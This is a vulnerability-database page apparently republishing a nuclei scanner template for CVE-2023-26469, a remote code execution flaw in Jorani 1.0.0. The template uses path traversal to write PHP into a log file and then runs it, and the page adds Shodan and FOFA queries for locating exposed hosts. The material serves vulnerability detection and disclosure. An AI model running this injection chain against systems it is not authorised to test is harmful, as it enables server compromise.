Lucene search
K

Jorani 1.0.0 - Remote Code Execution

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 332 Views

Jorani 1.0.0 - Remote Code Execution vulnerability, allows attacker to execute arbitrary code on serve

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Jorani Remote Code Execution Exploit
21 Aug 202300:00
zdt
GithubExploit
Exploit for Path Traversal in Jorani
1 Sep 202309:41
githubexploit
ATTACKERKB
CVE-2023-26469
17 Aug 202319:15
attackerkb
BDU FSTEC
The vulnerability of the Jorani employee leave management software lies in the incorrect restriction on the path to the restricted catalog. This allows a hacker to execute arbitrary code.
27 Oct 202300:00
bdu_fstec
Circl
CVE-2023-26469
17 Aug 202322:38
circl
CNNVD
Jorani 路径遍历漏洞
17 Aug 202300:00
cnnvd
CVE
CVE-2023-26469
17 Aug 202300:00
cve
Cvelist
CVE-2023-26469
17 Aug 202300:00
cvelist
Metasploit
Jorani unauthenticated Remote Code Execution
19 Aug 202319:51
metasploit
NVD
CVE-2023-26469
17 Aug 202319:15
nvd
Rows per page
id: CVE-2023-26469

info:
  name: Jorani 1.0.0 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Jorani to a patched version or apply the necessary security patches.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26469
    - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
    - https://github.com/advisories/GHSA-7r9h-9r47-7vjj
    - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html
    - https://jorani.org/security-features-in-lms.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26469
    cwe-id: CWE-22
    epss-score: 0.81918
    epss-percentile: 0.99607
    cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: jorani
    product: jorani
    shodan-query: http.favicon.hash:-2032163853
    fofa-query: icon_hash=-2032163853
  tags: cve2023,cve,jorani,rce,packetstorm,vkev,vuln
variables:
  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){echo md5('CVE-2023-26469');unlink(__FILE__);} ?>"
  header: "{{to_upper(rand_base(12))}}"

http:
  - raw:
      - |
        GET /session/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /session/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
      - |
        GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
        Host: {{Hostname}}
        X-REQUESTED-WITH: XMLHttpRequest
        {{header}}: CVE-2023-26469

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '7cca0844e81cd333152def045fe075c2'

      - type: status
        part: header_3
        status:
          - 401

    extractors:
      - type: regex
        part: body
        group: 1
        internal: true
        name: csrf
        regex:
          - 'name="csrf_test_jorani" value="(.*?)"'
# digest: 4b0a00483046022100f85decf102e795f5d04109550514ed54559819e3052266cfe901fba4eb85dec8022100a83112d4cee73ad91052453f873e32af1a3ca48521c9fcd964f26d87d83602cc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.81918
SSVC
332